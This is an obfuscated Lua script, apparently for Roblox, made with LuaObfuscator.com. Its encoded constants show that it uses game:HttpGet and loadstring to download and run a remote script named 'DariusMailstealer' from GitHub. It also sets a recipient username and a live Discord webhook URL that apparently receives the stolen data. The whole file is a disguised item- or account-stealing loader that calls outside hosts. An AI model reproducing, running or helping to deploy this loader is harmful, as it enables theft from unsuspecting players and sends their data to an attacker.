--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.15) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v70=v2(v0(v30,16));if v19 then local v78=v5(v70,v19);v19=nil;return v78;else return v70;end end end);local function v20(v31,v32,v33)if v33 then local v71=(v31/((879 -(282 + 595))^(v32-(1638 -(1523 + 114)))))%((5 -3)^(((v33-(2 -(1 + 0))) -(v32-(1 -0))) + (2 -1))) ;return v71-(v71%(620 -(555 + 64))) ;else local v72=931 -(857 + 74) ;local v73;while true do if (v72==(568 -(367 + 201))) then v73=2^(v32-(928 -(214 + 713))) ;return (((v31%(v73 + v73))>=v73) and (1 + 0)) or (0 + 0) ;end end end end local function v21()local v34=(117 -(32 + 85)) -0 ;local v35;while true do if (v34==1) then return v35;end if (v34==(1065 -(68 + 997))) then v35=v1(v16,v18,v18);v18=v18 + ((1246 + 25) -(226 + 232 + 812)) ;v34=4 -3 ;end end end local function v22()local v36=957 -(655 + 237 + 65) ;local v37;local v38;while true do if (v36==(2 -1)) then return (v38 * 256) + v37 ;end if (v36==(0 -0)) then v37,v38=v1(v16,v18,v18 + (3 -1) );v18=v18 + (352 -(87 + 263)) ;v36=181 -(67 + 113) ;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + (7 -4) );v18=v18 + 4 ;return (v42 * 16777216) + (v41 * (48199 + 17337)) + (v40 * (1017 -761)) + v39 ;end local function v24()local v43=(1913 -(1789 + 124)) -0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(441 -(145 + 293))) then if (v48==(952 -(802 + (916 -(745 + 21))))) then if (v47==(1486 -(998 + 384 + 104))) then return v49 * ((1055 -(87 + 968)) -0) ;else v48=1 -0 ;v46=0 + (0 -0) ;end elseif (v48==(1490 + 557)) then return ((v47==(772 -(201 + 197 + 374))) and (v49 * ((998 -((2517 -1602) + 82))/(0 -0)))) or (v49 * NaN) ;end return v8(v49,v48-(601 + 422) ) * (v46 + (v47/((2 + 0 + 0)^((266 -198) -16)))) ;end if (v43==((2602 -(447 + 966)) -(1069 + 118))) then v48=v20(v45,47 -26 ,(208 -132) -45 );v49=((v20(v45,69 -37 )==(1 + 0)) and  -(1 -(1817 -(1703 + 114)))) or (886 -(261 + 624)) ;v43=3 + 0 ;end if (v43==(792 -((1069 -(376 + 325)) + 423))) then v46=3 -2 ;v47=(v20(v45,(12 + 1412) -(630 + 793) ,38 -(10 + 8) ) * ((7 -5)^32)) + v44 ;v43=444 -(416 + 26) ;end if (v43==(0 -0)) then v44=v23();v45=v23();v43=1 + 0 ;end end end local function v25(v50)local v51;if  not v50 then local v74=0 -0 ;while true do if (v74==0) then v50=v23();if (v50==(0 -(14 -(9 + 5)))) then return "";end break;end end end v51=v3(v16,v18,(v18 + v50) -(1 + 0) );v18=v18 + v50 ;local v52={};for v67=(378 -(85 + 291)) -1 , #v51 do v52[v67]=v2(v1(v3(v51,v67,v67)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0 -0 ;local v54;local v55;local v56;local v57;local v58;local v59;while true do local v69=0 -0 ;while true do if (v69==0) then if (v53~=(1 + 0)) then else local v96=241 -(187 + 54) ;while true do if (v96==(3 -2)) then for v106=1,v58 do local v107=780 -(162 + 618) ;local v108;local v109;while true do if (v107~=(0 + 0)) then else local v112=0;local v113;while true do if (v112==(0 -0)) then v113=0 + 0 ;while true do if (v113==(1 -0)) then v107=1258 -(1043 + 214) ;break;end if ((0 -0)~=v113) then else local v174=1212 -(323 + 889) ;while true do if (v174==(0 -0)) then v108=v21();v109=nil;v174=1;end if (v174==1) then v113=581 -(361 + 219) ;break;end end end end break;end end end if (v107~=(1 -0)) then else if (v108==(1 + 0)) then v109=v21()~=(1636 -(1373 + 263)) ;elseif (v108==(1 + 1)) then v109=v24();elseif (v108==(1003 -(451 + 549))) then v109=v25();end v59[v106]=v109;break;end end end v57[3]=v21();v96=2;end if (v96==(1 + 1)) then v53=2 -0 ;break;end if (v96~=(0 -0)) then else v58=v23();v59={};v96=1;end end end if (v53~=(2 -0)) then else local v97=0;while true do if (v97==(1385 -(746 + 638))) then return v57;end if ((0 + 0)==v97) then local v105=0 + 0 ;while true do if (v105==(850 -(20 + 830))) then for v115=1,v23() do local v116=0 -0 ;local v117;local v118;local v119;while true do if ((341 -(218 + 123))==v116) then v117=0 + 0 ;v118=nil;v116=1;end if (v116~=1) then else v119=nil;while true do if (v117==(126 -(116 + 10))) then local v175=1581 -(1535 + 46) ;while true do if (v175==(1 + 0)) then v117=1 + 0 ;break;end if (v175==(0 -0)) then local v179=560 -(306 + 254) ;while true do if (v179==(0 + 0)) then v118=0;v119=nil;v179=1 -0 ;end if (v179==(1468 -(899 + 568))) then v175=1 + 0 ;break;end end end end end if (v117~=(1 + 0)) then else while true do if (v118==(0 -0)) then v119=v21();if (v20(v119,604 -(268 + 335) ,291 -(60 + 230) )==0) then local v180=572 -(426 + 146) ;local v181;local v182;local v183;while true do if (v180==(1 + 1)) then local v184=1456 -(282 + 1174) ;while true do if (v184~=(812 -(569 + 242))) then else v180=8 -5 ;break;end if (v184==(405 -(118 + 287))) then if (v20(v182,1,1 + 0 )==(1122 -(118 + 1003))) then v183[5 -3 ]=v59[v183[1026 -(706 + 318) ]];end if (v20(v182,9 -7 ,2)==1) then v183[3]=v59[v183[1254 -(721 + 530) ]];end v184=1;end end end if (v180==(1274 -(945 + 326))) then if (v20(v182,7 -4 ,3)==1) then v183[4 + 0 ]=v59[v183[704 -(271 + 429) ]];end v54[v115]=v183;break;end if (v180~=1) then else local v186=0 -0 ;while true do if (v186==0) then v183={v22(),v22(),nil,nil};if (v181==(1086 -(461 + 625))) then local v193=0;local v194;while true do if (v193==0) then v194=1288 -(993 + 295) ;while true do if (v194==(0 + 0)) then v183[2 + 1 ]=v22();v183[2 + 2 ]=v22();break;end end break;end end elseif (v181==1) then v183[2 + 1 ]=v23();elseif (v181==(1173 -(418 + 753))) then v183[3]=v23() -((1 + 1)^(2 + 14)) ;elseif (v181~=(1 + 2)) then else local v199=0 + 0 ;local v200;local v201;while true do if (v199==(1 + 0)) then while true do if (v200==(529 -(406 + 123))) then v201=1769 -(1749 + 20) ;while true do if (v201==0) then v183[3]=v23() -((1 + 1)^16) ;v183[1326 -(1249 + 73) ]=v22();break;end end break;end end break;end if (v199==0) then v200=1329 -(797 + 532) ;v201=nil;v199=1 + 0 ;end end end v186=1;end if (v186==1) then v180=1147 -(466 + 679) ;break;end end end if (v180~=(0 + 0)) then else v181=v20(v119,4 -2 ,3);v182=v20(v119,9 -5 ,6);v180=1;end end end break;end end break;end end break;end end end for v120=1203 -(373 + 829) ,v23() do v55[v120-1 ]=v28();end v105=732 -(476 + 255) ;end if (v105~=(1131 -(369 + 761))) then else v97=2 -1 ;break;end end end end end v69=1901 -(106 + 1794) ;end if (v69==(1 + 0)) then if (v53==(0 + 0)) then local v98=0 + 0 ;local v99;while true do if (v98~=(0 -0)) then else v99=0;while true do if (v99==(0 -0)) then local v110=114 -(4 + 110) ;while true do if (v110~=0) then else v54={};v55={};v110=1;end if ((1 -0)~=v110) then else v99=1 -0 ;break;end end end if (v99==(585 -(57 + 527))) then local v111=238 -(64 + 174) ;while true do if (v111==(1428 -(41 + 1386))) then v99=1 + 1 ;break;end if ((103 -(17 + 86))==v111) then v56={};v57={v54,v55,nil,v56};v111=1;end end end if (v99==(218 -(42 + 174))) then v53=1 + 0 ;break;end end break;end end end break;end end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (1==v63) then v66=v60[3];return function(...)local v79=v64;local v80=v65;local v81=v66;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do v91=v79[v83];v92=v91[1];if (v92<=10) then if (v92<=4) then if (v92<=1) then if (v92==0) then do return;end else v62[v91[3]]=v89[v91[2]];end elseif (v92<=2) then v89[v91[2]]=v91[3];elseif (v92==3) then local v135=v91[2];local v136=v89[v91[3]];v89[v135 + 1 ]=v136;v89[v135]=v136[v91[4]];else v89[v91[2]]=v91[3]~=0 ;end elseif (v92<=7) then if (v92<=5) then if (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end elseif (v92==6) then local v142=v91[2];local v143,v144=v82(v89[v142](v13(v89,v142 + 1 ,v91[3])));v84=(v144 + v142) -1 ;local v145=0;for v161=v142,v84 do v145=v145 + 1 ;v89[v161]=v143[v145];end else v89[v91[2]]=v62[v91[3]];end elseif (v92<=8) then v62[v91[3]]=v89[v91[2]];elseif (v92==9) then local v148=0;local v149;while true do if (v148==0) then v149=v91[2];v89[v149]=v89[v149](v13(v89,v149 + 1 ,v84));break;end end else v83=v91[3];end elseif (v92<=15) then if (v92<=12) then if (v92==11) then local v128=0;local v129;local v130;while true do if (1==v128) then v89[v129 + 1 ]=v130;v89[v129]=v130[v91[4]];break;end if (v128==0) then v129=v91[2];v130=v89[v91[3]];v128=1;end end else v83=v91[3];end elseif (v92<=13) then v89[v91[2]]=v91[3]~=0 ;elseif (v92==14) then local v151=0;local v152;local v153;local v154;local v155;while true do if (v151==0) then v152=v91[2];v153,v154=v82(v89[v152](v13(v89,v152 + 1 ,v91[3])));v151=1;end if (v151==1) then v84=(v154 + v152) -1 ;v155=0;v151=2;end if (v151==2) then for v176=v152,v84 do v155=v155 + 1 ;v89[v176]=v153[v155];end break;end end else local v156=0;local v157;while true do if (v156==0) then v157=v91[2];v89[v157]=v89[v157](v13(v89,v157 + 1 ,v84));break;end end end elseif (v92<=18) then if (v92<=16) then if (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end elseif (v92==17) then do return;end else v89[v91[2]]();end elseif (v92<=19) then v89[v91[2]]=v91[3];elseif (v92==20) then v89[v91[2]]();else v89[v91[2]]=v62[v91[3]];end v83=v83 + 1 ;end end;end if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D653203093O004C4F55414B53323034030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403523O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F50726F636F6465723534392F446172697573536372697074732F6D61696E2F4461726975734D61696C737465616C657203083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3134353035383237313836373137393032302F6D522O4469496265525F5259543455522D54534F705952735778444D374234354E766A49484A424D6C2D6B53504748557278572O3138794756356D3146716459396A6F6300173O0012133O00013O0026103O000E0001000200040A3O000E0001001213000100043O001201000100033O001207000100053O001207000200063O002003000200020007001213000400084O000D000500014O000E000200054O000900013O00022O001400010001000100040A3O001600010026103O00010001000100040A3O00010001001213000100043O001201000100093O0012130001000B3O0012010001000A3O0012133O00023O00040A3O000100016O00017O00",v9(),...);
